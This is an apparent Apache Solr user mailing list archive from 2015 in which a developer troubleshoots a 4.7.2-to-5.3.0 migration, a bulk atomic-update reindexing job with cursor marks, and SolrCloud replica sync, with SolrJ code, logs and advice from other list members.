> > search is done through a set of bigger documents. What if the logic is
> > turned a little bit around. I have a document and I need to find out what
> > strings appear in the document. A string here could be a person name
> > (including space for example) or a location...which are indexed in Solr.
> >
> > A concrete example, we take this text from wikipedia (Mad Max):
> > "*Mad Max is a 1979 Australian dystopian action film directed by George
> > Miller <https://en.wikipedia.org/wiki/George_Miller_%28director%29>.
> > Written by Miller and James McCausland from a story by Miller and
> producer
> > Byron Kennedy <https://en.wikipedia.org/wiki/Byron_Kennedy>, it tells a
> > story of societal breakdown
> > <https://en.wikipedia.org/wiki/Societal_collapse>, murder, and vengeance
> > <https://en.wikipedia.org/wiki/Revenge>. The film, starring the
> > then-little-known Mel Gibson <https://en.wikipedia.org/wiki/Mel_Gibson>,
> > was released internationally in 1980. It became a top-grossing Australian
> > film, while holding the record in the Guinness Book of Records
> > <https://en.wikipedia.org/wiki/Guinness_Book_of_Records> for decades as
> > the
> > most profitable film ever created,[1]
> > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-1> and
> > has
> > been credited for further opening the global market to Australian New
> Wave
> > <https://en.wikipedia.org/wiki/Australian_New_Wave> films.*
> > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-2>
> > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-3>"
> >
> > I would like it to match "Mad Max" but not "Mad" or "Max" seperately, and
> > "George Miller", "global market" ...
> >
> > I've tried the keywordTokenizer but it didn't work. I suppose it's ok for
> > the index time but not query time (in this specific case)
> >
> > I had a look at Luwak but it's not what I'm looking for (
> >
> >
> http://www.flax.co.uk/blog/2013/12/06/introducing-luwak-a-library-for-high-performance-stored-queries/
> > )
> >
> > The typical name search doesn't seem to work either,
> > https://dzone.com/articles/tips-name-search-solr
> >
> > I was thinking this problem must have already be solved...or?
> >
> > Remi
> >
>


Re: Solr 4.7.2 Vs 5.3.0 Docs different for same query

2015-10-02 Thread Ravi Solr
Thank you very much Erick and Uchida. I will take a look at the URL u gave
Erick.

Thanks

Ravi Kiran Bhaskar

On Fri, Oct 2, 2015 at 12:41 PM, Tomoko Uchida <tomoko.uchida.1...@gmail.com
> wrote:

> Hi Ravi,
>
> And for minor additional information,
> you may want to look through Collections API reference guide to handle
> collections properly in SolrCloud environment. (I bookmark this page.)
> https://cwiki.apache.org/confluence/display/solr/Collections+API
> <https://cwiki.apache.org/confluence/display/solr/Collections+API>
>
> Regards,
> Tomoko
>
> 2015-10-03 1:15 GMT+09:00 Erick Erickson <erickerick...@gmail.com>:
>
> > do we have to "reload" the collections on all the nodes to see the
> > updated config ??
> > YES
> >
> > Is there a single call which can update all nodes connected to the
> > ensemble ??
> >
> > NO. I'll be a little pedantic here. When you say "ensemble", I'm not
> quite
> > sure
> > what that means and am interpreting it as "all collections registered
> with
> > ZK".
> > But see below.
> >
> > I just went to the admin UI and hit "Reload" button manually on each
> > of the node...Is that
> > the correct way to do it ?
> >
> > NO. The admin UI, "core admin" is a remnant from the old days (like
> > 3.x) where there was
> > no concept of distributed collection as a distinct entity, you had to
> > do all the things you now
> > do automatically in SolrCloud "by hand". PLEASE DO NOT USE THIS
> > EXCEPT TO VIEW A REPLICA WHEN USING SOLRCLOUD! In particular, don't try
> to
> > take any action that manipulates the core (reload, add, unload and the
> > like).
> > It'll work, but you have to know _exactly_ what you are doing. Go
> > ahead and use it for
> > viewing the current state of a replica/core, but unless you need to do
> > something that
> > you cannot do with the Collections API it's very easy to go astray.
> >
> >
> > Instead, use the "collections API". In this case, there's a call like
> >
> >
> >
> http://localhost:8983/solr/admin/collections?action=RELOAD=CollectionName
> >
> > that will cause all the replicas associated with the collection to be
> > reloaded. Given you
> > mentioned linkconfig, I'm guessing that you have more than one
> > collection looking at a
> > particular configset, so the pedantic bit is you'd have to issue the
> > above for each
> > collection that references that configset.
> >
> > Best,
> > Erick
> >
> > P.S. Two bits:
> > 1> actually the collections API uses the core admin calls to
> > accomplish its tasks, but
> > lots of effort went in to doing exactly the right thing
> > 2> Upayavira has been creating an updated admin UI that will treat
> > collections as
> > first-class citizens (a work in progress). You can access it in 5.x by
> > hitting
> >
> > solr_host:solr_port/solr/index.html
> >
> > Give it a whirl if you can and please provide any feedback you can, it'd
> > be much
> > appreciated.
> >
> > On Fri, Oct 2, 2015 at 7:47 AM, Ravi Solr <ravis...@gmail.com> wrote:
> > > Mr. Uchida,
> > > Thank you for responding. It was my fault, I had a update
> > processor
> > > which takes specific text and string fields and concatenates them into
> a
> > > single field, and I search on that single field. Recently I used Atomic
> > > update to fix a specific field's value and forgot to disable the
> > > UpdateProcessor chain...Since I was only updating one field the
> aggregate
> > > field got messed up with just that field value and hence I had issues
> > > searching. I reindexed the data again yesterday night and now it is all
> > > good.
> > >
> > > I do have a small question, when we update the zookeeper ensemble with
> > new
> > > configs via 'upconfig' and 'linkconfig' commands do we have to "reload"
> > the
> > > collections on all the nodes to see the updated config ?? Is there a
> > single
> > > call which can update all nodes connected to the ensemble ?? I just
> went
> > to
> > > the admin UI and hit "Reload" button manually on each of the node...Is
> > that
> > > the correct way to do it ?
> > >
> > > Thanks
> > >
> > > Ravi Kiran Bhaskar
> > >
> > > On Fri, Oct 2, 2015 at 12:04 AM, Tomoko Uchida <
> > tomoko.uchida.1...@gmail.com
> > >> 

Solr 4.7.2 Vs 5.3.0 Docs different for same query

2015-10-01 Thread Ravi Solr
I we migrated from 4.7.2 to 5.3.0. I sourced the docs from 4.7.2 core and
indexed into 5.3.0 collection (data directories are different) via
SolrEntityProcessor. Currently my production is all whack because of this
issue. Do I have to go back and reindex all again ?? Is there a quick fix
for this ?

Here are the results for the query 'obama'...please note the numfound.
4.7.2 has almost 148519 docs while 5.3.0 says it only has 5.3.0 docs. Any
pointers on how to correct this ?


Solr 4.7.2



  0
  2
  
 obama
  0
   
  
  


SolrCloud 5.3.0


  
   0
   2
   
obama
0

   
   



Thanks

Ravi Kiran Bhaskar


Re: bulk reindexing 5.3.0 issue

2015-09-28 Thread Ravi Solr
Gili I was constantly checking the cloud admin UI and it always stayed
Green, that is why I initially overlooked sync issues...finally when all
options dried out I went individually to each node and quieried and that is
when i found the out of sync issue. The way I resolved my issue was shut
down the leader that was not synching properly and let another node become
the leader, then reindex all docs. Once the reindexing is done I started
the node that was causing the issue and it synched properly :-)

Thanks

Ravi Kiran Bhaskar



On Mon, Sep 28, 2015 at 10:26 AM, Gili Nachum <gilinac...@gmail.com> wrote:

> Were all of shard replica in active state (green color in admin ui) before
> starting?
> Sounds like it otherwise you won't hit the replica that is out of sync.
>
> Replicas can get out of sync, and report being in sync after a sequence of
> stop start w/o a chance to complete sync.
> See if it might have happened to you:
>
> http://mail-archives.apache.org/mod_mbox/lucene-solr-user/201412.mbox/%3CCAOOKt53XTU_e0m2ioJ-S4SfsAp8JC6m-=nybbd4g_mjh60b...@mail.gmail.com%3E
> On Sep 27, 2015 06:56, "Ravi Solr" <ravis...@gmail.com> wrote:
>
> > Erick...There is only one type of String
> > "sun.org.mozilla.javascript.internal.NativeString:" and no other
> variations
> > of that in my index, so no question of missing it. Point taken regarding
> > the CURSORMARK stuff, yes you are correct, my head so numb at this point
> > after working 3 days on this, I wasnt thinking straight.
> >
> > BTW I found the real issue, I have a total of 8 servers in the solr
> cloud.
> > The leader for this specific collection was the one that was returning 0
> > for the searches. All other 7 servers had roughly 800K docs still needing
> > the string replacement. So maybe the real issue is sync among servers.
> Just
> > to prove to myself I shutdown the solr  that was giving zero results
> (i.e.
> > all uuid strings have already been somehow devoid of spurious
> > sun.org.mozilla.javascript.internal.NativeString on that server). Now it
> > ran perfectly fine and is about to finish as last 103K are still left
> when
> > I was writing this email.
> >
> > So the real question is how can we ensure that the Sync is always
> > maintained and what to do if it ever goes out of Sync, I did see some
> Jira
> > tickets from previous 4.10.x versions where Sync was an issue. Can you
> > please point me to any doc which says how SolrCloud synchs/replicates ?
> >
> > Thanks,
> >
> > Ravi Kiran Bhaskar
> >
> > Thanks
> >
> > Rvai Kiran Bhaskar
> >
> > On Sat, Sep 26, 2015 at 11:00 PM, Erick Erickson <
> erickerick...@gmail.com>
> > wrote:
> >
> > > bq: 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially
> > > using
> > > 100 docs batch, which, I later increased to 500 docs per batch. Also it
> > > would not be a infinite loop if I commit for each batch, right !!??
> > >
> > > That's not the point at all. Look at the basic logic here:
> > >
> > > You run for a while processing 100 (or 500 or 1,000) docs per batch
> > > and change all uuid fields with this statement:
> > >
> > > uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", "");
> > >
> > > and then update the doc. You run this as long as you have any docs
> > > that satisfy the query "q=uuid:sun.org.mozilla*", _changing_
> > > every one that has this string!
> > >
> > > At that point, theoretically, no document in your index has this
> string.
> > So
> > > running your update program immediately after should find _zero_
> > documents.
> > >
> > > I've been assuming your complaint is that you don't process 1.4 M docs
> > (in
> > > batches), you process some lower number then exit and you think this is
> > > wrong.
> > > I'm claiming that you should only expect to find as many docs as have
> > been
> > > indexed since the last time the program ran.
> > >
> > > As far as the infinite loop is concerned, again trace the logic in the
> > old
> > > code.
> > > Forget about commits and all the mechanics, just look at the logic.
> > > You're querying on "sun.org.mozilla*". But you only change if you get a
> > > match on
> > > "sun.org.mozilla.javascript.internal.NativeString:"
> > >
> > > Now imagine you have a doc that has sun.org.mozilla.erick in it. That
> doc
> > > gets
> > > returned fr

Re: bulk reindexing 5.3.0 issue

2015-09-26 Thread Ravi Solr
Erick I fixed the "missing content stream" issue as well. by making sure
Iam not adding empty list. However, My very first issue of getting zero
docs once in a while is still haunting me, even after using cursorMarkers,
disabling auto commit and soft commit. I ran code two times and you can see
the statement returns zero docs at random times.

log.info("Indexed " + count + "/" + docList.getNumFound());

-bash-4.1$ tail -f reindexing.log
2015-09-26 01:44:40 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 6500/1440653
2015-09-26 01:44:44 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 7000/1439863
2015-09-26 01:44:48 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 7500/1439410
2015-09-26 01:44:56 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 8000/1438918
2015-09-26 01:45:01 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 8500/1438330
2015-09-26 01:45:01 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 8500/0
2015-09-26 01:45:06 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!

2015-09-26 01:48:15 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 500/1437440
2015-09-26 01:48:19 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1000/1437440
2015-09-26 01:48:19 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1000/0
2015-09-26 01:48:22 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!


Thanks

Ravi Kiran Bhaskar

On Sat, Sep 26, 2015 at 1:17 AM, Ravi Solr <ravis...@gmail.com> wrote:

> Erick as per your advise I used cursorMarks (see code below). It was
> slightly better but Solr throws Exceptions randomly. Please look at the
> code and Stacktrace below
>
> 2015-09-26 01:00:45 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 500/1453133
> 2015-09-26 01:00:49 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1000/1453133
> 2015-09-26 01:00:54 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1500/1452592
> 2015-09-26 01:00:58 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2000/1452095
> 2015-09-26 01:01:03 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2500/1451675
> 2015-09-26 01:01:10 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3000/1450924
> 2015-09-26 01:01:15 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3500/1450445
> 2015-09-26 01:01:19 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4000/1449997
> 2015-09-26 01:01:24 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4500/1449692
> 2015-09-26 01:01:28 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 5000/1449201
> 2015-09-26 01:01:28 ERROR [a.b.c.AdhocCorrectUUID] - Error indexing
> org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:
> Error from server at http://xx.xx.xx.xx:/solr/collection1: missing
> content stream
> at
> org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:560)
> at
> org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:234)
> at
> org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:226)
> at
> org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:376)
> at
> org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:328)
> at
> org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1085)
> at
> org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:856)
> at
> org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:799)
> at
> org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:135)
> at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:107)
> at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:72)
> at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:86)
> at a.b.c.AdhocCorrectUUID.processDocs(AdhocCorrectUUID.java:97)
> at a.b.c.AdhocCorrectUUID.main(AdhocCorrectUUID.java:37)
> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
> at
> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
> at
> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
> at java.lang.reflect.Method.invoke(Method.java:606)
> at com.simontuffs.onejar.Boot.run(Boot.java:306)
> at com.simontuffs.onejar.Boot.main(Boot.java:159)
> 2015-09-26 01:01:28 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!
>
>
> CODE
> 
> protected static void processDocs() {
>
> try {
> CloudSolrClient client = new
> CloudSolrClient("zk1:,zk2:,zk3.com:");
> client.setDefaultCollection("collection1");
>
> boolean done = false;
> String cursorMark = CursorMarkParams.CURSOR_MARK_START;
> Integer count = 0;
>
> while (!done) {
> SolrQuery q = new
> SolrQuery("*:*").setRows(500).addSort(&

Re: bulk reindexing 5.3.0 issue

2015-09-26 Thread Ravi Solr
Erick & Shawn I incrporated your suggestions.


0. Shut off all other indexing processes.
1. As Shawn mentioned set batch size to 1.
2. Loved Erick's suggestion about not using filter at all and sort by
uniqueId and put last known uinqueId as next queries start while still
using cursor marks as follows

SolrQuery q = new SolrQuery("+uuid:sun.org.mozilla* +uniqueId:{" +
markerSysId + " TO
*]").setRows(1).addSort("uniqueId",ORDER.asc).setFields(new
String[]{"uniqueId","uuid"});
q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark);

3. As per Shawn's advise commented autocommit and soft commit in
solrconfig.xml and set openSearcher to false and issued MANUAL COMMIT for
every batch from code as follows

client.commit(true, true, true);

Here is what the log statement & results - log.info("Indexed " + count +
"/" + docList.getNumFound());


2015-09-26 17:29:57 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 9/1344085
2015-09-26 17:30:30 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 10/1334085
2015-09-26 17:33:26 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 11/1324085
2015-09-26 17:36:09 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 12/1314085
2015-09-26 17:39:42 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 13/1304085
2015-09-26 17:43:05 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 14/1294085
2015-09-26 17:46:14 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 15/1284085
2015-09-26 17:48:22 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 16/1274085
2015-09-26 17:48:25 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 16/0
2015-09-26 17:48:25 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!

Ran manually a second time to see if first was fluke. Still same.

2015-09-26 17:55:26 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1/1264716
2015-09-26 17:58:07 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2/1254716
2015-09-26 18:03:09 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3/1244716
2015-09-26 18:06:32 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4/1234716
2015-09-26 18:10:35 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 5/1224716
2015-09-26 18:15:23 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 6/1214716
2015-09-26 18:15:24 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 6/0
2015-09-26 18:15:26 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!

Now changed the autommit in solrconfig.xml as follows...Note the soft
commit has been shut off as per Shawn's advise


   
   30
 false


  

2015-09-26 18:47:44 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 1/1205451
2015-09-26 18:50:49 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 2/1195451
2015-09-26 18:54:18 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 3/1185451
2015-09-26 18:57:04 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 4/1175451
2015-09-26 19:00:10 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 5/1165451
2015-09-26 19:00:13 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
Indexed 5/0
2015-09-26 19:00:13 INFO  [com.wpost.search.reindexing.AdhocCorrectUUID] -
FINISHED !!!


The query still returned 0 results when they are over million docs
available which match uuid:sun.org.mozilla* ...Then why do I get 0 ???

Thanks

Ravi Kiran Bhaskar

On Sat, Sep 26, 2015 at 3:49 PM, Ravi Solr <ravis...@gmail.com> wrote:

> Thank you Erick & Shawn for taking significant time off your weekends to
> debug and explain in great detail. I will try to address the main points
> from your emails to provide more situation context for better understanding
> of my situation
>
> 1. Erick, As part of our upgrade from 4.7.2 to 5.3.0 I re-indexed all docs
> from my old Master-Slave to My SolrCloud using DIH SolrEntityProcessor
> which used a Script Transformer. I unwittingly messed up the script and
> hence this 'uuid' (String Type field) got messed up. All records prior to
> Sep 20 2015 have this issue that I am currently try to rectify.
>
> 2. Regarding openSearcher=true/false, I had it as false all along in my
> 4.7.2 config. I read somewhere that SolrCloud or 5.x doesn't honor it or it
> should be left default (Don't exactly remember where I read it), hence, I
> removed it from my solrconfig.xml going against my intuition :-)
>
> 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially using
> 100 docs batch, which, I later increased to 500 docs per batch. Also it
> would not be a infinite loop if I commit for each batch, right !!??
>
> 4. Shawn, you are correct the uuid is of String Type and its not unique
> key for my schema. My uniqueKey is uniqueId and systemid is of no
> consequence here, it's another field for differentiating apps within my
> solr.
>
> Than you very much again guys. I will incorporate your suggestions and
> report back.
>
> Thanks
>
> Ravi Kiran Bhaskar
>
&g

Re: bulk reindexing 5.3.0 issue

2015-09-26 Thread Ravi Solr
Thank you Erick & Shawn for taking significant time off your weekends to
debug and explain in great detail. I will try to address the main points
from your emails to provide more situation context for better understanding
of my situation

1. Erick, As part of our upgrade from 4.7.2 to 5.3.0 I re-indexed all docs
from my old Master-Slave to My SolrCloud using DIH SolrEntityProcessor
which used a Script Transformer. I unwittingly messed up the script and
hence this 'uuid' (String Type field) got messed up. All records prior to
Sep 20 2015 have this issue that I am currently try to rectify.

2. Regarding openSearcher=true/false, I had it as false all along in my
4.7.2 config. I read somewhere that SolrCloud or 5.x doesn't honor it or it
should be left default (Don't exactly remember where I read it), hence, I
removed it from my solrconfig.xml going against my intuition :-)

3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially using
100 docs batch, which, I later increased to 500 docs per batch. Also it
would not be a infinite loop if I commit for each batch, right !!??

4. Shawn, you are correct the uuid is of String Type and its not unique key
for my schema. My uniqueKey is uniqueId and systemid is of no consequence
here, it's another field for differentiating apps within my solr.

Than you very much again guys. I will incorporate your suggestions and
report back.

Thanks

Ravi Kiran Bhaskar

On Sat, Sep 26, 2015 at 12:58 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Oh, one more thing. _assuming_ you can't change the indexing process
> that gets the docs from the system of record, why not just add an
> update processor that does this at index time? See:
> https://cwiki.apache.org/confluence/display/solr/Update+Request+Processors
> ,
> in particular the StatelessScriptUpdateProcessorFactory might be a
> good candidate. It just takes a bit of javascript (or other scripting
> language) and changes the record before it gets indexed.
>
> FWIW,
> Erick
>
> On Sat, Sep 26, 2015 at 9:52 AM, Shawn Heisey <apa...@elyograg.org> wrote:
> > On 9/26/2015 10:41 AM, Shawn Heisey wrote:
> >>  30 
> >
> > This needs to include openSearcher=false, as Erick mentioned.  I'm sorry
> > I screwed that up:
> >
> >   
> > 30
> > false
> >   
> >
> > Thanks,
> > Shawn
>


Re: bulk reindexing 5.3.0 issue

2015-09-26 Thread Ravi Solr
Erick...There is only one type of String
"sun.org.mozilla.javascript.internal.NativeString:" and no other variations
of that in my index, so no question of missing it. Point taken regarding
the CURSORMARK stuff, yes you are correct, my head so numb at this point
after working 3 days on this, I wasnt thinking straight.

BTW I found the real issue, I have a total of 8 servers in the solr cloud.
The leader for this specific collection was the one that was returning 0
for the searches. All other 7 servers had roughly 800K docs still needing
the string replacement. So maybe the real issue is sync among servers. Just
to prove to myself I shutdown the solr  that was giving zero results (i.e.
all uuid strings have already been somehow devoid of spurious
sun.org.mozilla.javascript.internal.NativeString on that server). Now it
ran perfectly fine and is about to finish as last 103K are still left when
I was writing this email.

So the real question is how can we ensure that the Sync is always
maintained and what to do if it ever goes out of Sync, I did see some Jira
tickets from previous 4.10.x versions where Sync was an issue. Can you
please point me to any doc which says how SolrCloud synchs/replicates ?

Thanks,

Ravi Kiran Bhaskar

Thanks

Rvai Kiran Bhaskar

On Sat, Sep 26, 2015 at 11:00 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> bq: 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially
> using
> 100 docs batch, which, I later increased to 500 docs per batch. Also it
> would not be a infinite loop if I commit for each batch, right !!??
>
> That's not the point at all. Look at the basic logic here:
>
> You run for a while processing 100 (or 500 or 1,000) docs per batch
> and change all uuid fields with this statement:
>
> uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", "");
>
> and then update the doc. You run this as long as you have any docs
> that satisfy the query "q=uuid:sun.org.mozilla*", _changing_
> every one that has this string!
>
> At that point, theoretically, no document in your index has this string. So
> running your update program immediately after should find _zero_ documents.
>
> I've been assuming your complaint is that you don't process 1.4 M docs (in
> batches), you process some lower number then exit and you think this is
> wrong.
> I'm claiming that you should only expect to find as many docs as have been
> indexed since the last time the program ran.
>
> As far as the infinite loop is concerned, again trace the logic in the old
> code.
> Forget about commits and all the mechanics, just look at the logic.
> You're querying on "sun.org.mozilla*". But you only change if you get a
> match on
> "sun.org.mozilla.javascript.internal.NativeString:"
>
> Now imagine you have a doc that has sun.org.mozilla.erick in it. That doc
> gets
> returned from the query but does _not_ get modified because it doesn't
> match your pattern. In the older code, it would be found again and
> returned next
> time you queried. Then not modified again. Eventually you'd be in a
> position
> where you never changed any docs, just kept getting the same docList back
> over and over again. Marching through based on the unique key should not
> have the same potential issue.
>
> You should not be mixing the new query stuff with CURSORMARK. Deep paging
> supposes the exact same query is being run over and over and you're
> _paging_
> through the results. You're changing the query every time so the results
> aren't
> very predictable.
>
> Best,
> Erick
>
>
> On Sat, Sep 26, 2015 at 5:01 PM, Ravi Solr <ravis...@gmail.com> wrote:
> > Erick & Shawn I incrporated your suggestions.
> >
> >
> > 0. Shut off all other indexing processes.
> > 1. As Shawn mentioned set batch size to 1.
> > 2. Loved Erick's suggestion about not using filter at all and sort by
> > uniqueId and put last known uinqueId as next queries start while still
> > using cursor marks as follows
> >
> > SolrQuery q = new SolrQuery("+uuid:sun.org.mozilla* +uniqueId:{" +
> > markerSysId + " TO
> > *]").setRows(1).addSort("uniqueId",ORDER.asc).setFields(new
> > String[]{"uniqueId","uuid"});
> > q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark);
> >
> > 3. As per Shawn's advise commented autocommit and soft commit in
> > solrconfig.xml and set openSearcher to false and issued MANUAL COMMIT for
> > every batch from code as follows
> >
> > client.commit(true, true, true);
> >
> > Here is what the log statement & results - log.info("Indexed " + count +
> > "/" + docList.get

Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
Erick as per your advise I used cursorMarks (see code below). It was
slightly better but Solr throws Exceptions randomly. Please look at the
code and Stacktrace below

2015-09-26 01:00:45 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 500/1453133
2015-09-26 01:00:49 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1000/1453133
2015-09-26 01:00:54 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 1500/1452592
2015-09-26 01:00:58 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2000/1452095
2015-09-26 01:01:03 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 2500/1451675
2015-09-26 01:01:10 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3000/1450924
2015-09-26 01:01:15 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 3500/1450445
2015-09-26 01:01:19 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4000/1449997
2015-09-26 01:01:24 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 4500/1449692
2015-09-26 01:01:28 INFO  [a.b.c.AdhocCorrectUUID] - Indexed 5000/1449201
2015-09-26 01:01:28 ERROR [a.b.c.AdhocCorrectUUID] - Error indexing
org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error
from server at http://xx.xx.xx.xx:/solr/collection1: missing content
stream
at
org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:560)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:234)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:226)
at
org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:376)
at
org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:328)
at
org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1085)
at
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:856)
at
org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:799)
at
org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:135)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:107)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:72)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:86)
at a.b.c.AdhocCorrectUUID.processDocs(AdhocCorrectUUID.java:97)
at a.b.c.AdhocCorrectUUID.main(AdhocCorrectUUID.java:37)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:606)
at com.simontuffs.onejar.Boot.run(Boot.java:306)
at com.simontuffs.onejar.Boot.main(Boot.java:159)
2015-09-26 01:01:28 INFO  [a.b.c.AdhocCorrectUUID] - FINISHED !!!


CODE

protected static void processDocs() {

try {
CloudSolrClient client = new
CloudSolrClient("zk1:,zk2:,zk3.com:");
client.setDefaultCollection("collection1");

boolean done = false;
String cursorMark = CursorMarkParams.CURSOR_MARK_START;
Integer count = 0;

while (!done) {
SolrQuery q = new
SolrQuery("*:*").setRows(500).addSort("publishtime",
ORDER.desc).addSort("uniqueId",ORDER.desc).setFields(new
String[]{"uniqueId","uuid"});
q.addFilterQuery(new String[] {"uuid:[* TO *]",
"uuid:sun.org.mozilla*"});
q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark);

QueryResponse resp = client.query(q);
String nextCursorMark = resp.getNextCursorMark();

SolrDocumentList docList = resp.getResults();

List inList = new
ArrayList();
for(SolrDocument doc : docList) {

SolrInputDocument iDoc =
ClientUtils.toSolrInputDocument(doc);

//This is my system's id
String uniqueId = (String)
iDoc.getFieldValue("uniqueId");

/*
 * This is another system's unique id which is what I
want to correct that was messed
 * because of script transformer in DIH import via
SolrEntityProcessor
 * ex-
sun.org.mozilla.javascript.internal.NativeString:9cdef726-05dd-40b7-b1b2-c9bbce96741f
 */
String uuid = (String) iDoc.getFieldValue("uuid");
String sanitizedUUID =
uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", "");
Map<String,String> fieldModifier = new
HashMap<String,String>(1);
fieldModifier.put("set",sanitizedUUID);
iDoc.setField("uuid", fieldModifier);

inList.add(iDoc);

bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
I have been trying to re-index the docs (about 1.5 million) as one of the
field needed part of string value removed (accidentally introduced). I was
issuing a query for 100 docs getting 4 fields and updating the doc  (atomic
update with "set") via the CloudSolrClient in batches, However from time to
time the query returns 0 results, which exits the re-indexing program.

I cant understand as to why the cloud returns 0 results when there are 1.4x
million docs which have the "accidental" string in them.

Is there another way to do bulk massive updates ?

Thanks

Ravi Kiran Bhaskar


Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
